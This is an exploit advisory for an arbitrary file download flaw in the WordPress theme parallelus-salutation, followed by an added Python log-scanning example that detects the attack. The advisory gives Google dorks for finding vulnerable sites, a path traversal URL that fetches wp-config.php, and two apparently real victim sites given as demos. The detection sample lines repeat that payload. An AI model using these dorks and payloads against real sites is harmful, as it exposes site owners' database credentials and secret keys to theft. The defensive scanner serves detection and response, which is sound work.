WordPress theme parallelus-salutation Arbitrary File Download Vulnerability

2015.11.29
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##############################################################
# Exploit Title: WordPress theme parallelus-salutation Arbitrary File Download Vulnerability
# Exploit Author: Iran Cyber Security Group
# Discovered By: injector
# Dork 1: inurl:themes/parallelus-salutation/
# Dork 2: inurl:themes/parallelus-salutation/framework/
# Date: 18-12-2014
# Tested on: Kali, Win7
# Category: webapps
# platform: php
##############################################################

VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] http://www.Site.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
##############

demo 1: www.scarabreseaXrch.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
demo 2: http://www.patcXhingprotocol.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
##############################################################
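Added example, not part of the original advisory: a log check that flags requests to the getfile.php handler whose file parameter leaves the download directory, including double-encoded separators. The combined access-log format, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Handler path taken from the advisory; matched as a suffix so any site prefix works.
HANDLER = "/themes/parallelus-salutation/framework/utilities/download/getfile.php"
# Assumed log format: Apache/nginx "combined" (client IP first, quoted request, status).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252F) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_param):
    """True if the decoded value has a '..' segment, an absolute path or a NUL byte."""
    path = fully_decode(file_param).replace("\\", "/")
    return (".." in path.split("/") or path.startswith("/")
            or re.match(r"[A-Za-z]:", path) is not None or "\x00" in path)

def scan(lines):
    """Return (ip, status, decoded file value) for each suspicious handler request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(HANDLER):
            continue
        # parse_qs decodes once; fully_decode catches further encoding layers.
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            if is_traversal(value):
                hits.append((m.group("ip"), int(m.group("status")), fully_decode(value)))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Dec/2014:10:01:02 +0000] "GET /wp-content' + HANDLER + '?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3121',
    '198.51.100.4 - - [18/Dec/2014:10:02:10 +0000] "GET /wp-content' + HANDLER + '?file=brochure.pdf HTTP/1.1" 200 48211',
    '203.0.113.9 - - [18/Dec/2014:10:03:44 +0000] "GET /wp-content' + HANDLER + '?file=..%252F..%252Fwp-config.php HTTP/1.1" 404 0',
    '198.51.100.8 - - [18/Dec/2014:10:04:00 +0000] "GET /index.php?file=..%2Fx HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, status, path in scan(SAMPLE_LOG):
        print(f"{ip} status={status} file={path}")
```

A hit with status 200 on wp-config.php means the file was probably served, so the database credentials and authentication salts it holds should be rotated.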

